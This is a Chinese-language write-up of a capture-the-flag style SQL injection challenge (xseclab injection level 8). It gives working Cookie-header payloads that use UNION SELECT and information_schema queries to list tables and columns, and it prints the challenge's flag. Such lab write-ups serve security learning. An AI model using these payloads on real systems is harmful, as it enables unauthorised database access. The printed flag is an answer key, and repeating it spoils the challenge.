网络信息安全攻防学习平台 注入关第八

2017-11-17  本文已影响0人  沙雕带你蒿羊毛

小明写了一个博客系统,为了防注入,他上网找了一个SQL注入通用防护模块,GET/POST都过滤了哦!

http://lab1.xseclab.com/sqli8_f4af04563c22b18b51d9142ab0bfb13d/index.php?id=1

题目提示过滤了get和post,也就是说,浏览器中的url输入框等东东是不用考虑了,所以我们可以考虑下   请求头中cookie注入。

and 1=1  and 1=2

常规注入测试,结果很明显

那么我们就开始order  by

order by 4 order by 3

可以测出来是3个字段

联合查询一下是爆出来2,3

顺手查一下数据库 用这个

Cookie: PHPSESSID=89fc744718e56193466ee905c44c2650;id=1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3

爆出数据库 manager_sqli8,   sae_user_sqli8

Cookie: PHPSESSID=89fc744718e56193466ee905c44c2650;id=1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7361655F6D616E616765725F73716C6938),3

我们先查一下sae_manager_sqli8

因为sae_user_sqli8我查过了。。里面没有啊

爆出id,username,password

答案出来了

IamFlagCookieInject!

上一篇 下一篇

猜你喜欢

热点阅读